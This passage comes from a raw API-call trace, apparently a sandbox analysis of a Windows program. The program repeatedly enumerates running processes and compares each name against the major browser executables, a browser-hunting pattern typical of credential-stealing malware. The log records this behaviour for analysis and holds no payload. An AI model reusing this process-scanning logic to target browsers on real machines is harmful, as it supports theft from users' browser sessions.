lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0166.750] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0166.750] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0166.750] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0166.750] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0166.750] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.750] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0166.751] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0166.751] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0166.751] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0166.751] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0166.751] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.751] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0166.751] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0166.751] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0166.751] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0166.752] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0166.752] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.752] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0166.752] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0166.752] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0166.752] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0166.752] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0166.752] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.752] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0166.753] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0166.753] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0166.753] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0166.753] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0166.753] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.753] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0166.753] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0166.753] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0166.753] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0166.753] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0166.754] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.754] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0166.754] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0166.754] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0166.754] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0166.754] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0166.754] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.754] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0166.755] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0166.755] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0166.755] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0166.755] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0166.755] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.755] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0166.755] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0166.755] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0166.755] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0166.755] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0166.755] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.755] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0166.756] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0166.756] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0166.756] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0166.756] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0166.756] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.756] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0166.757] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0166.757] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0166.757] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0166.757] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0166.757] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.757] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0166.757] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0166.757] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0166.757] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0166.757] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0166.757] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.757] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0166.758] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0166.758] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0166.758] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0166.758] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0166.758] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.758] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0166.758] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0166.758] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0166.759] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0166.759] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0166.759] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.759] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.759] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.759] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.759] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.759] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0166.759] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.759] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0166.760] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0166.760] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0166.760] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0166.760] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0166.760] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.760] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.760] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.760] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.760] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.761] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0166.761] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.761] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0166.761] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0166.761] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0166.761] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0166.761] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0166.761] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.761] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.762] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.762] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.762] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.762] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0166.762] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.762] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0166.762] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0166.762] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0166.762] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0166.762] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0166.762] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.762] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0166.763] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0166.763] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0166.763] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0166.763] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0166.763] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.763] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0166.764] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0166.764] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0166.764] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0166.764] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0166.764] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.764] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0166.764] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0166.764] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0166.764] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0166.764] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0166.764] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.764] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0166.853] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0166.853] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0166.853] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0166.853] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0166.853] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.853] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0166.854] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0166.854] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0166.854] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0166.854] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0166.854] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.854] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0166.855] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0166.855] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0166.855] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0166.855] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0166.855] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.855] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0166.855] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0166.855] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0166.855] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0166.855] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0166.855] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.855] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0166.856] CloseHandle (hObject=0xe8) returned 1 [0166.856] Sleep (dwMilliseconds=0x3e8) [0168.007] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0168.009] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.010] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0168.010] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0168.010] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0168.010] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0168.010] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0168.010] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0168.010] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0168.010] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0168.010] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0168.010] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0168.010] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0168.010] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0168.011] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0168.011] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0168.011] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0168.011] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0168.011] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.011] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0168.011] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0168.011] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0168.011] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0168.012] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0168.012] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.012] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0168.012] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0168.012] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0168.012] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0168.012] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0168.012] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.012] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0168.013] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0168.013] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0168.013] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0168.013] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0168.013] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.013] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0168.013] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0168.013] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0168.013] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0168.013] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0168.013] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.013] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0168.014] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0168.014] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0168.014] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0168.014] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0168.014] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.014] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0168.015] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0168.015] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0168.015] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0168.015] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0168.015] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0168.015] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, 